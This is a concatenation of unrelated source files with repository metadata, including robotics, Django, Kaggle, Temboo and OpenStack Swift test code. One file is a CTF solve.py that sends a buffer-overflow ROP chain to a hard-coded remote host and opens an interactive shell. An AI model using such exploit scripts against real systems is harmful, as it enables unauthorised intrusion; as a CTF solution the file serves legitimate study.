sub.call("cp {}/voxelyzeMain/voxelyze .".format(SIMULATOR_DIR), shell=True)
sub.call("chmod 755 voxelyze", shell=True)
pre_damage_shape = quadruped(QUAD_SIZE)
post_damage_shape = quadruped(QUAD_SIZE)
post_damage_shape[:IND_SIZE[1]/2, :IND_SIZE[1]/2, :IND_SIZE[2]/2] = 0 # leg 1
# post_damage_shape[IND_SIZE[1]/2:, :IND_SIZE[1]/2, :IND_SIZE[2]/2] = 0 # leg 2
# post_damage_shape[:IND_SIZE[1]/2, IND_SIZE[1]/2:, :IND_SIZE[2]/2] = 0 # leg 3
post_damage_shape[IND_SIZE[1]/2:, IND_SIZE[1]/2:, :IND_SIZE[2]/2] = 0 # leg 4
class MyGenotype(Genotype):
def __init__(self):
Genotype.__init__(self, orig_size_xyz=IND_SIZE)
# quadrupedal structure
self.add_network(DirectEncoding(output_node_name="material", orig_size_xyz=IND_SIZE), freeze=True)
self.to_phenotype_mapping.add_map(name="material", tag="<Data>", output_type=int, logging_stats=None)
# controller (phi; phase-offsets)
self.add_network(CPPN(output_node_names=["phase_offset"]))
self.to_phenotype_mapping.add_map(name="phase_offset", tag="<PhaseOffset>")
MyGenotype.NET_DICT = {"material": post_damage_shape}
if not os.path.isfile("./" + RUN_DIR + "/pickledPops/Gen_0.pickle"):
random.seed(SEED)
np.random.seed(SEED)
my_sim = Sim(dt_frac=DT_FRAC, simulation_time=SIM_TIME, fitness_eval_init_time=INIT_TIME,
min_temp_fact=MIN_TEMP_FACT)
my_env = Env(temp_amp=TEMP_AMP, frequency=FREQ, muscle_stiffness=STIFFNESS)
my_objective_dict = ObjectiveDict()
my_objective_dict.add_objective(name="fitness", maximize=True, tag=FITNESS_TAG)
my_objective_dict.add_objective(name="age", maximize=False, tag=None)
my_pop = Population(my_objective_dict, MyGenotype, Phenotype, pop_size=POP_SIZE)
my_optimization = ParetoOptimization(my_sim, my_env, my_pop)
my_optimization.run(max_hours_runtime=MAX_TIME, max_gens=MAX_GENS, num_random_individuals=NUM_RANDOM_INDS,
directory=RUN_DIR, name=RUN_NAME, max_eval_time=MAX_EVAL_TIME,
time_to_try_again=TIME_TO_TRY_AGAIN, checkpoint_every=CHECKPOINT_EVERY,
save_vxa_every=SAVE_VXA_EVERY)
else:
continue_from_checkpoint(directory=RUN_DIR, max_hours_runtime=MAX_TIME, max_eval_time=MAX_EVAL_TIME,
time_to_try_again=TIME_TO_TRY_AGAIN, checkpoint_every=CHECKPOINT_EVERY,
save_vxa_every=SAVE_VXA_EVERY)
| [
"sam.kriegman@uvm.edu"
] | sam.kriegman@uvm.edu |
56bc12f05d19205c8116be58692e496f43a60321 | 5f7a50f57fce3894a66180ecf77d13e7927c0860 | /DarkCON2021/Pwn_Easy-ROP/src/solve.py | 5f12093c1fb72b3039b36bfa3af66495111131f9 | [] | no_license | Mumuzi7179/CTFWriteups | 2a0282bd81db753df644f0aa122078396ee2bb8c | 9c918a788e18a41092834431ab137b5d102aea90 | refs/heads/master | 2023-07-17T00:31:05.140197 | 2021-03-19T19:56:13 | 2021-03-19T19:56:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | from pwn import *
from subprocess import Popen, PIPE
import sys
host = '65.1.92.179'
port = 49153
# The result of ROPgadget execution (!# part of it)
f = open("ropgadgetRes.py", "r")
pycode = f.read()
exec(pycode)
ropchain = p
off = 'a'*72
payload = off + ropchain
print(payload)
#t = process('./easy-rop')
t = remote(host, port)
t.sendline(payload)
t.interactive()
t.close() | [
"a.ahsani248@gmail.com"
] | a.ahsani248@gmail.com |
4e7fc439451fd0522ef5071a18742ae80ab6cbcf | 077240acd51d76e5882d89f31970dc9a0b1287a5 | /winston_jobs/migrations/0001_initial.py | 5bc447414a4257c347ffa55b3342dd0f31976fc3 | [] | no_license | Madrox/Winston | f8bb3c425c98613c2e0bf08ce6a33b07d702ee7e | f9ecc0fa594fa7cbfcaecf49cb6c465583356030 | refs/heads/master | 2021-01-13T05:24:14.695275 | 2017-04-22T21:31:32 | 2017-04-22T21:31:32 | 81,413,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,666 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-14 02:44
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='History',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('run_date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True)),
],
),
migrations.CreateModel(
name='KeyVal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('key', models.CharField(max_length=100)),
('val', models.TextField(blank=True)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='winston_jobs.Job')),
],
),
migrations.AddField(
model_name='history',
name='job',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='winston_jobs.Job'),
),
migrations.AlterUniqueTogether(
name='keyval',
unique_together=set([('job', 'key')]),
),
]
| [
"david.horn@disney.com"
] | david.horn@disney.com |
16ae617aa0dff53873785822c7cb2db033f9590b | 494e3fbbdff5cf6edb087f3103ad5f15acbc174f | /schedule/migrations/0002_auto_20180727_2329.py | d0a6847d6321e79defcf1bfbd06aa6f38fb59def | [] | no_license | TalentoUnicamp/my | 1209048acdedbb916b8ae8ec80761d09f6ad7754 | 3d87a33cd282d97dbbbd5f62658f231456f12765 | refs/heads/master | 2020-03-23T21:12:58.316033 | 2018-08-14T06:11:36 | 2018-08-14T06:11:36 | 142,090,262 | 11 | 0 | null | 2018-08-17T05:13:26 | 2018-07-24T01:53:23 | JavaScript | UTF-8 | Python | false | false | 1,698 | py | # Generated by Django 2.0.3 on 2018-07-28 02:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('schedule', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='event',
name='attended',
field=models.ManyToManyField(null=True, related_name='attended_events', to='user_profile.Profile'),
),
migrations.AlterField(
model_name='event',
name='attendees',
field=models.ManyToManyField(null=True, related_name='selected_events', to='user_profile.Profile'),
),
migrations.AlterField(
model_name='event',
name='event_type',
field=models.CharField(choices=[('Meta', 'Meta'), ('Keynote', 'Keynote'), ('Workshop', 'Workshop'), ('Palestra', 'Palestra')], max_length=20),
),
migrations.AlterField(
model_name='event',
name='max_attendees',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='event',
name='speaker',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='my_events', to='user_profile.Profile'),
),
migrations.AlterField(
model_name='feedback',
name='comments',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='feedback',
name='rating',
field=models.IntegerField(blank=True, null=True),
),
]
| [
"gustavomaronato@gmail.com"
] | gustavomaronato@gmail.com |
65d1eb9d9c06b987fe9a9cc21d850cc58d620bfc | e82c1576b6e25d357b23c481ea48aea86272c227 | /venv/Scripts/django-admin.py | 94eb30a8d92e4cd11f2972d4ead9be43bf2044be | [] | no_license | MatheusLeall/api-curriculos | d72d28f27576394abcdcd352895e9b6ce7e3c8c2 | b49d945579d22b66fb57d71644e065f0f664dd24 | refs/heads/master | 2022-12-18T14:26:18.266325 | 2020-09-24T14:59:33 | 2020-09-24T14:59:33 | 298,092,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | #!c:\users\matheus\documents\django projects\authentication_scheme\venv\scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"matheuscardoso.pro@gmail.com"
] | matheuscardoso.pro@gmail.com |
9abea3f326ea59ebd86d1c7b1d83e63ad82ffd60 | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/ChenglongChen_Kaggle_HomeDepot/Kaggle_HomeDepot-master/Code/Chenglong/feature_group_distance.py | 8be14bcf62e8f822d47294b1071b3b95a6516e0a | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 4,848 | py | # -*- coding: utf-8 -*-
"""
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: group relevance based distance features
@note: such features are not used in final submission
"""
import re
import string
import numpy as np
import pandas as pd
import config
from config import TRAIN_SIZE
from utils import dist_utils, ngram_utils, nlp_utils
from utils import logging_utils, pkl_utils, time_utils
from feature_base import BaseEstimator, StandaloneFeatureWrapper, PairwiseFeatureWrapper
# tune the token pattern to get a better correlation with y_train
# token_pattern = r"(?u)\b\w\w+\b"
# token_pattern = r"\w{1,}"
# token_pattern = r"\w+"
# token_pattern = r"[\w']+"
token_pattern = " " # just split the text into tokens
# -------------------- Group by (obs, relevance) based distance features ----------------------------------- #
# Something related to Query Expansion
class GroupRelevance_Ngram_Jaccard(BaseEstimator):
"""Single aggregation features"""
def __init__(self, obs_corpus, target_corpus, id_list, dfTrain, target_field, relevance, ngram, aggregation_mode=""):
super().__init__(obs_corpus, target_corpus, aggregation_mode, id_list)
self.dfTrain = dfTrain[dfTrain["relevance"] != 0].copy()
self.target_field = target_field
self.relevance = relevance
self.relevance_str = self._relevance_to_str()
self.ngram = ngram
self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
def __name__(self):
if isinstance(self.aggregation_mode, str):
feat_name = "Group_%sRelevance_%s_Jaccard_%s"%(
self.relevance_str, self.ngram_str, string.capwords(self.aggregation_mode))
elif isinstance(self.aggregation_mode, list):
feat_name = ["Group_%sRelevance_%s_Jaccard_%s"%(
self.relevance_str, self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
return feat_name
def _relevance_to_str(self):
if isinstance(self.relevance, float):
return re.sub("\.", "d", str(self.relevance))
else:
return str(self.relevance)
def transform_one(self, obs, target, id):
df = self.dfTrain[self.dfTrain["search_term"] == obs].copy()
val_list = [config.MISSING_VALUE_NUMERIC]
if df is not None:
df = df[df["id"] != id].copy()
df = df[df["relevance"] == self.relevance].copy()
if df is not None and df.shape[0] > 0:
target_tokens = nlp_utils._tokenize(target, token_pattern)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
val_list = []
for x in df[self.target_field]:
x_tokens = nlp_utils._tokenize(x, token_pattern)
x_ngrams = ngram_utils._ngrams(x_tokens, self.ngram)
val_list.append(dist_utils._jaccard_coef(x_ngrams, target_ngrams))
return val_list
# -------------------------------- Main ----------------------------------
def main():
logname = "generate_feature_group_distance_%s.log"%time_utils._timestamp()
logger = logging_utils._get_logger(config.LOG_DIR, logname)
dfAll = pkl_utils._load(config.ALL_DATA_LEMMATIZED_STEMMED)
dfTrain = dfAll.iloc[:TRAIN_SIZE].copy()
## run python3 splitter.py first
split = pkl_utils._load("%s/splits_level1.pkl"%config.SPLIT_DIR)
n_iter = len(split)
relevances_complete = [1, 1.25, 1.33, 1.5, 1.67, 1.75, 2, 2.25, 2.33, 2.5, 2.67, 2.75, 3]
relevances = [1, 1.33, 1.67, 2, 2.33, 2.67, 3]
ngrams = [1]
obs_fields = ["search_term"]
target_fields = ["product_title", "product_description"]
aggregation_mode = ["mean", "std", "max", "min", "median"]
## for cv
for i in range(n_iter):
trainInd, validInd = split[i][0], split[i][1]
dfTrain2 = dfTrain.iloc[trainInd].copy()
sub_feature_dir = "%s/Run%d" % (config.FEAT_DIR, i+1)
for target_field in target_fields:
for relevance in relevances:
for ngram in ngrams:
param_list = [dfAll["id"], dfTrain2, target_field, relevance, ngram, aggregation_mode]
pf = PairwiseFeatureWrapper(GroupRelevance_Ngram_Jaccard, dfAll, obs_fields, [target_field], param_list, sub_feature_dir, logger)
pf.go()
## for all
sub_feature_dir = "%s/All" % (config.FEAT_DIR)
for target_field in target_fields:
for relevance in relevances:
for ngram in ngrams:
param_list = [dfAll["id"], dfTrain, target_field, relevance, ngram, aggregation_mode]
pf = PairwiseFeatureWrapper(GroupRelevance_Ngram_Jaccard, dfAll, obs_fields, [target_field], param_list, sub_feature_dir, logger)
pf.go()
if __name__ == "__main__":
main()
| [
"659338505@qq.com"
] | 659338505@qq.com |
4fccba1e6cf207096ecb5d43ef2b1e74b10f2d7a | e41651d8f9b5d260b800136672c70cb85c3b80ff | /Notification_System/temboo/Library/Flickr/PhotoComments/LeaveComment.py | 86bbc8411b315c8fddfd9fdd48b7df1f6c43f6c9 | [] | no_license | shriswissfed/GPS-tracking-system | 43e667fe3d00aa8e65e86d50a4f776fcb06e8c5c | 1c5e90a483386bd2e5c5f48f7c5b306cd5f17965 | refs/heads/master | 2020-05-23T03:06:46.484473 | 2018-10-03T08:50:00 | 2018-10-03T08:50:00 | 55,578,217 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,616 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# LeaveComment
# Add a comment to a specified photo on Flickr.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class LeaveComment(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the LeaveComment Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(LeaveComment, self).__init__(temboo_session, '/Library/Flickr/PhotoComments/LeaveComment')
def new_input_set(self):
return LeaveCommentInputSet()
def _make_result_set(self, result, path):
return LeaveCommentResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return LeaveCommentChoreographyExecution(session, exec_id, path)
class LeaveCommentInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the LeaveComment
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Flickr (AKA the OAuth Consumer Key).)
"""
super(LeaveCommentInputSet, self)._set_input('APIKey', value)
def set_APISecret(self, value):
"""
Set the value of the APISecret input for this Choreo. ((required, string) The API Secret provided by Flickr (AKA the OAuth Consumer Secret).)
"""
super(LeaveCommentInputSet, self)._set_input('APISecret', value)
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process.)
"""
super(LeaveCommentInputSet, self)._set_input('AccessToken', value)
def set_AccessTokenSecret(self, value):
"""
Set the value of the AccessTokenSecret input for this Choreo. ((required, string) The Access Token Secret retrieved during the OAuth process.)
"""
super(LeaveCommentInputSet, self)._set_input('AccessTokenSecret', value)
def set_CommentText(self, value):
"""
Set the value of the CommentText input for this Choreo. ((required, string) The text of the comment you are adding.)
"""
super(LeaveCommentInputSet, self)._set_input('CommentText', value)
def set_PhotoID(self, value):
"""
Set the value of the PhotoID input for this Choreo. ((required, integer) The id of the photo to add a comment to)
"""
super(LeaveCommentInputSet, self)._set_input('PhotoID', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: xml and json. Defaults to json.)
"""
super(LeaveCommentInputSet, self)._set_input('ResponseFormat', value)
class LeaveCommentResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the LeaveComment Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Flickr.)
"""
return self._output.get('Response', None)
class LeaveCommentChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return LeaveCommentResultSet(response, path)
| [
"shriswissfed@gmail.com"
] | shriswissfed@gmail.com |
e6187d164bdeea61b67cf310e711e2bfcf7d24ca | 765d96d61ccca9be466d25774dc83dc2fca65a48 | /kmp/1701_Cubeditor.py | 4a3a279b97247e27ddac79098d6e51f832a53eb0 | [] | no_license | myJamong/algorism_solved | 3deedb0edbffebf9a860fe8cc75a2e9a73c55baa | af6c1db030f56695e4c0d2e647f21fd1d564421f | refs/heads/master | 2023-07-06T17:44:19.401772 | 2021-08-17T04:54:46 | 2021-08-17T04:54:46 | 289,707,966 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | # https://www.acmicpc.net/problem/1701
# Cubeditor
import sys
def make_table(p):
p_size = len(p)
table = [0] * p_size
j = 0
for i in range(1,p_size):
while j > 0 and p[i] != p[j]:
j = table[j-1]
if p[i] == p[j]:
j += 1
table[i] = j
return table
if __name__ == "__main__":
txt = sys.stdin.readline().strip()
result = 0
for i in range(len(txt)):
s = txt[i:] # 시작 지점을 0번째부터 쭉 봤을때 pi table을 만드는 것 자체가 앞에서부터 뒤어서부터 동일한 문자열 --> 같은 문자열 2개인 길이를 배열로 반환
table = make_table(s)
result = max(result,max(table))
print(result)
| [
"noreply@github.com"
] | myJamong.noreply@github.com |
db84e674ce7d15eff7e41c37de05990d4479b2a6 | 71c515d8411c06dbab6e91f15a755aa2fe4094ef | /test/unit/container/test_server.py | 627d67cdac73538e9d691292aff66ccf26eca4f2 | [] | no_license | mawentao007/swift | 6f54dc9e24db41d928b8f403bb18273d97d7f7aa | fc2de6d75f0e718f4a46bead57a71a19cdb0fb3e | refs/heads/master | 2021-03-12T20:18:48.961232 | 2013-10-29T14:14:47 | 2013-10-29T14:14:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75,820 | py | # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import operator
import os
import mock
import unittest
from contextlib import contextmanager
from shutil import rmtree
from StringIO import StringIO
from tempfile import mkdtemp
from xml.dom import minidom
from eventlet import spawn, Timeout, listen
import simplejson
from swift.common.swob import Request, HeaderKeyDict
import swift.container
from swift.container import server as container_server
from swift.common.utils import mkdirs, public, replication
from swift.common.ondisk import normalize_timestamp
from test.unit import fake_http_connect
@contextmanager
def save_globals():
orig_http_connect = getattr(swift.container.server, 'http_connect',
None)
try:
yield True
finally:
swift.container.server.http_connect = orig_http_connect
class TestContainerController(unittest.TestCase):
"""Test swift.container.server.ContainerController"""
def setUp(self):
"""Set up for testing swift.object_server.ObjectController"""
self.testdir = os.path.join(mkdtemp(),
'tmp_test_object_server_ObjectController')
mkdirs(self.testdir)
rmtree(self.testdir)
mkdirs(os.path.join(self.testdir, 'sda1'))
mkdirs(os.path.join(self.testdir, 'sda1', 'tmp'))
self.controller = container_server.ContainerController(
{'devices': self.testdir, 'mount_check': 'false'})
def tearDown(self):
"""Tear down for testing swift.object_server.ObjectController"""
rmtree(os.path.dirname(self.testdir), ignore_errors=1)
def test_acl_container(self):
# Ensure no acl by default
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0'})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('201'))
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assert_('x-container-read' not in response.headers)
self.assert_('x-container-write' not in response.headers)
# Ensure POSTing acls works
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': '1', 'X-Container-Read': '.r:*',
'X-Container-Write': 'account:user'})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('204'))
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assertEquals(response.headers.get('x-container-read'), '.r:*')
self.assertEquals(response.headers.get('x-container-write'),
'account:user')
# Ensure we can clear acls on POST
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': '3', 'X-Container-Read': '',
'X-Container-Write': ''})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('204'))
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assert_('x-container-read' not in response.headers)
self.assert_('x-container-write' not in response.headers)
# Ensure PUTing acls works
req = Request.blank(
'/sda1/p/a/c2', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '4', 'X-Container-Read': '.r:*',
'X-Container-Write': 'account:user'})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('201'))
req = Request.blank('/sda1/p/a/c2', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assertEquals(response.headers.get('x-container-read'), '.r:*')
self.assertEquals(response.headers.get('x-container-write'),
'account:user')
def test_HEAD(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD',
'HTTP_X_TIMESTAMP': '0'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assertEquals(int(response.headers['x-container-bytes-used']), 0)
self.assertEquals(int(response.headers['x-container-object-count']), 0)
req2 = Request.blank(
'/sda1/p/a/c/o', environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1', 'HTTP_X_SIZE': 42,
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x'})
req2.get_response(self.controller)
response = req.get_response(self.controller)
self.assertEquals(int(response.headers['x-container-bytes-used']), 42)
self.assertEquals(int(response.headers['x-container-object-count']), 1)
def test_HEAD_not_found(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_HEAD_invalid_partition(self):
req = Request.blank('/sda1/./a/c', environ={'REQUEST_METHOD': 'HEAD',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_HEAD_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'HEAD',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_HEAD_invalid_content_type(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'},
headers={'Accept': 'application/plain'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 406)
def test_HEAD_invalid_format(self):
format = '%D1%BD%8A9' # invalid UTF-8; should be %E1%BD%8A9 (E -> D)
req = Request.blank(
'/sda1/p/a/c?format=' + format,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_PUT(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
def test_PUT_obj_not_found(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1', 'X-Size': '0',
'X-Content-Type': 'text/plain', 'X-ETag': 'e'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_PUT_GET_metadata(self):
# Set metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(1),
'X-Container-Meta-Test': 'Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'), 'Value')
# Set another metadata header, ensuring old one doesn't disappear
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(1),
'X-Container-Meta-Test2': 'Value2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'), 'Value')
self.assertEquals(resp.headers.get('x-container-meta-test2'), 'Value2')
# Update metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(3),
'X-Container-Meta-Test': 'New Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Send old update to metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(2),
'X-Container-Meta-Test': 'Old Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Remove metadata header (by setting it to empty)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(4),
'X-Container-Meta-Test': ''})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assert_('x-container-meta-test' not in resp.headers)
def test_PUT_invalid_partition(self):
req = Request.blank('/sda1/./a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_PUT_timestamp_not_float(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 'not-float'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_PUT_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_POST_HEAD_metadata(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(1)})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# Set metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(1),
'X-Container-Meta-Test': 'Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'), 'Value')
# Update metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(3),
'X-Container-Meta-Test': 'New Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Send old update to metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(2),
